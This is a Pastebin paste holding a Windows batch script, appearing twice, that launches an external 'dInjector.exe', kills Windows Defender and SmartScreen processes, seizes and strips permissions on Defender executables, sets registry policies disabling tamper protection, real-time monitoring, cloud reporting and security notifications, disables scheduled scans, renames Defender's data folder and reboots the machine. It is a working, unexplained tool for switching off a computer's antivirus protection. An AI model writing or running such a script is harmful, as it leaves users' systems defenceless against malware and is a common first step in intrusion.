Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @Echo off
- cd /D "%~dp0"
- "%~dp0dInjector.exe" /A "%~dp0"
- set "SPMWD=HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
- set "SCCSS=HKLM\SYSTEM\CurrentControlSet\Services\"
- set "SMWD=HKLM\SOFTWARE\Microsoft\Windows Defender"
- set "SMWCV=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\"
- set "USMWCV=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\"
- set "SPMME=HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\"
- set "SPMWS=HKLM\SOFTWARE\Policies\Microsoft\Windows\System"
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G LEQ 7601 goto :WIN7
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G EQU 9200 goto :WIN8
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G EQU 9600 goto :WIN8
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G GEQ 10240 goto :WIN10
- :WIN7
- Reg.exe delete "%SPMWD%" /f
- Reg.exe add "%SCCSS%WinDefend" /v "Start" /t REG_DWORD /d "0x4" /f
- SCHTASKS.exe /Change /TN "Microsoft\Windows Defender\MP Scheduled Scan" /Disable
- goto :END
- :WIN8
- for %%i in (
- "%ProgramFiles%\Windows Defender\MsMpEng.exe"
- ) do (
- takeown.exe /f %%i /a
- icacls.exe %%i /reset
- icacls.exe %%i /inheritance:r
- )
- Reg.exe delete "%SPMWD%" /f
- Reg.exe add "%SCCSS%WdBoot" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisDrv" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisSvc" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WinDefend" /v "Start" /t REG_DWORD /d "0x4" /f
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- goto :END
- :WIN10
- for %%A in (MDCoreSvc, SecurityHealthService, Sense, WdBoot, WdNisDrv, WdNisSvc, WinDefend) do TASKKILL /F /T /FI "SERVICES eq %%A"
- for %%A in (MpDefenderCoreService.exe, MpCmdRun.exe, MsMpEng.exe, SecurityHealthService.exe, SecurityHealthSystray.exe, smartscreen.exe) do TASKKILL /F /T /FI "IMAGENAME eq %%A"
- for %%i in (
- "%ProgramFiles%\Windows Defender\MpDefenderCoreService.exe","%ProgramFiles%\Windows Defender\MpCmdRun.exe","%ProgramFiles%\Windows Defender\MsMpEng.exe","%SystemRoot%\System32\smartscreen.exe"
- ) do (
- takeown.exe /f %%i /a
- icacls.exe %%i /reset
- icacls.exe %%i /inheritance:r
- )
- Reg.exe delete "%SPMWD%" /f
- Reg.exe add "%SPMWD%\Features" /v "TamperProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%" /v "PUAProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\CoreService" /v "DisableCoreServiceECSIntegration" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\CoreService" /v "DisableCoreService1DSTelemetry" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Features" /v "TamperProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%" /v "PUAProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DpaDisabled" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%" /v "AllowFastServiceStartup" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%" /v "DisableAntiSpyware" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%" /v "DisableAntiVirus" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%" /v "ServiceKeepAlive" /t REG_DWORD /d "0x0" /f
- Reg.exe query "%SPMWD%\Policy Manager" >nul 2>&1 || Reg.exe add "%SPMWD%\Policy Manager" /f && Reg.exe delete "%SPMWD%\Policy Manager" /ve /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0x2" /f
- Reg.exe add "%SCCSS%SecurityHealthService" /v "Start" /t REG_DWORD /d "0x3" /f
- Reg.exe add "%SCCSS%Sense" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdBoot" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisDrv" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisSvc" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WinDefend" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%MDCoreSvc" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SMWCV%Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWCV%Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0x0" /f
- if exist "%ProgramData%\Microsoft\Windows Defender" ren "%ProgramData%\Microsoft\Windows Defender" "Windows Defender.back"
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- Reg.exe add "%SMWCV%Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "off" /f
- Reg.exe add "%USMWCV%AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWCV%AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMME%PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWS%" /v "EnableSmartScreen" /t REG_DWORD /d "0x0" /f
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G LSS 22621 goto :END
- Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0x0" /f
- Reg.exe delete "%SMWD%" /v "IsServiceRunning" /f
- Reg.exe add "%SPMWD%\Features" /v "DisableCoreService1DSTelemetry" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Features" /v "DisableCoreServiceECSIntegration" /t REG_DWORD /d "0x1" /f
- :END
- Reg.exe add "%SMWD%" /v "AllowFastServiceStartup" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%" /v "DisableAntiSpyware" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%" /v "DisableAntiVirus" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%" /v "ServiceKeepAlive" /t REG_DWORD /d "0x0" /f
- Reg.exe query "%SMWD%\Policy Manager" >nul 2>&1 || Reg.exe add "%SMWD%\Policy Manager" /f && Reg.exe delete "%SMWD%\Policy Manager" /ve /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0x2" /f
- cls
- gpupdate /Force
- "%~dp0dInjector.exe" /D "%~dp0"
- TIMEOUT /T 3 /NOBREAK
- cd /D "%~dp0"
- "%~dp0dInjector.exe" /A "%~dp0"
- set "SPMWD=HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"
- set "SCCSS=HKLM\SYSTEM\CurrentControlSet\Services\"
- set "SMWD=HKLM\SOFTWARE\Microsoft\Windows Defender"
- set "SMWCV=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\"
- set "USMWCV=HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\"
- set "SPMME=HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\"
- set "SPMWS=HKLM\SOFTWARE\Policies\Microsoft\Windows\System"
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G LEQ 7601 goto :WIN7
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G EQU 9200 goto :WIN8
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G EQU 9600 goto :WIN8
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G GEQ 10240 goto :WIN10
- :WIN7
- Reg.exe delete "%SPMWD%" /f
- Reg.exe add "%SCCSS%WinDefend" /v "Start" /t REG_DWORD /d "0x4" /f
- SCHTASKS.exe /Change /TN "Microsoft\Windows Defender\MP Scheduled Scan" /Disable
- goto :END
- :WIN8
- for %%i in (
- "%ProgramFiles%\Windows Defender\MsMpEng.exe"
- ) do (
- takeown.exe /f %%i /a
- icacls.exe %%i /reset
- icacls.exe %%i /inheritance:r
- )
- Reg.exe delete "%SPMWD%" /f
- Reg.exe add "%SCCSS%WdBoot" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisDrv" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisSvc" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WinDefend" /v "Start" /t REG_DWORD /d "0x4" /f
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- goto :END
- :WIN10
- for %%A in (MDCoreSvc, SecurityHealthService, Sense, WdBoot, WdNisDrv, WdNisSvc, WinDefend) do TASKKILL /F /T /FI "SERVICES eq %%A"
- for %%A in (MpDefenderCoreService.exe, MpCmdRun.exe, MsMpEng.exe, SecurityHealthService.exe, SecurityHealthSystray.exe, smartscreen.exe) do TASKKILL /F /T /FI "IMAGENAME eq %%A"
- for %%i in (
- "%ProgramFiles%\Windows Defender\MpDefenderCoreService.exe","%ProgramFiles%\Windows Defender\MpCmdRun.exe","%ProgramFiles%\Windows Defender\MsMpEng.exe","%SystemRoot%\System32\smartscreen.exe"
- ) do (
- takeown.exe /f %%i /a
- icacls.exe %%i /reset
- icacls.exe %%i /inheritance:r
- )
- Reg.exe delete "%SPMWD%" /f
- Reg.exe add "%SPMWD%\Features" /v "TamperProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%" /v "PUAProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\CoreService" /v "DisableCoreServiceECSIntegration" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\CoreService" /v "DisableCoreService1DSTelemetry" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Features" /v "TamperProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%" /v "PUAProtection" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DpaDisabled" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%" /v "AllowFastServiceStartup" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%" /v "DisableAntiSpyware" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%" /v "DisableAntiVirus" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%" /v "ServiceKeepAlive" /t REG_DWORD /d "0x0" /f
- Reg.exe query "%SPMWD%\Policy Manager" >nul 2>&1 || Reg.exe add "%SPMWD%\Policy Manager" /f && Reg.exe delete "%SPMWD%\Policy Manager" /ve /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWD%\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0x2" /f
- Reg.exe add "%SCCSS%SecurityHealthService" /v "Start" /t REG_DWORD /d "0x3" /f
- Reg.exe add "%SCCSS%Sense" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdBoot" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisDrv" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WdNisSvc" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%WinDefend" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SCCSS%MDCoreSvc" /v "Start" /t REG_DWORD /d "0x4" /f
- Reg.exe add "%SMWCV%Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance" /v "Enabled" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWCV%Notifications\Settings\Windows.Defender.SecurityCenter" /v "Enabled" /t REG_DWORD /d "0x0" /f
- if exist "%ProgramData%\Microsoft\Windows Defender" ren "%ProgramData%\Microsoft\Windows Defender" "Windows Defender.back"
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
- SCHTASKS.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
- Reg.exe add "%SMWCV%Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "off" /f
- Reg.exe add "%USMWCV%AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWCV%AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMME%PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SPMWS%" /v "EnableSmartScreen" /t REG_DWORD /d "0x0" /f
- for /f "tokens=6 delims=[]. " %%G in ('ver') do if %%G LSS 22621 goto :END
- Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Policy" /v "VerifiedAndReputablePolicyState" /t REG_DWORD /d "0x0" /f
- Reg.exe delete "%SMWD%" /v "IsServiceRunning" /f
- Reg.exe add "%SPMWD%\Features" /v "DisableCoreService1DSTelemetry" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SPMWD%\Features" /v "DisableCoreServiceECSIntegration" /t REG_DWORD /d "0x1" /f
- :END
- Reg.exe add "%SMWD%" /v "AllowFastServiceStartup" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%" /v "DisableAntiSpyware" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%" /v "DisableAntiVirus" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%" /v "ServiceKeepAlive" /t REG_DWORD /d "0x0" /f
- Reg.exe query "%SMWD%\Policy Manager" >nul 2>&1 || Reg.exe add "%SMWD%\Policy Manager" /f && Reg.exe delete "%SMWD%\Policy Manager" /ve /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "0x1" /f
- Reg.exe add "%SMWD%\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\Spynet" /v "SpyNetReporting" /t REG_DWORD /d "0x0" /f
- Reg.exe add "%SMWD%\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0x2" /f
- cls
- gpupdate /Force
- "%~dp0dInjector.exe" /D "%~dp0"
- TIMEOUT /T 3 /NOBREAK
- Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t REG_BINARY /d "030000000000000000000000" /f
- "%~dp0reboot.exe"
- exit
Advertisement
Add Comment
Please, Sign In to add comment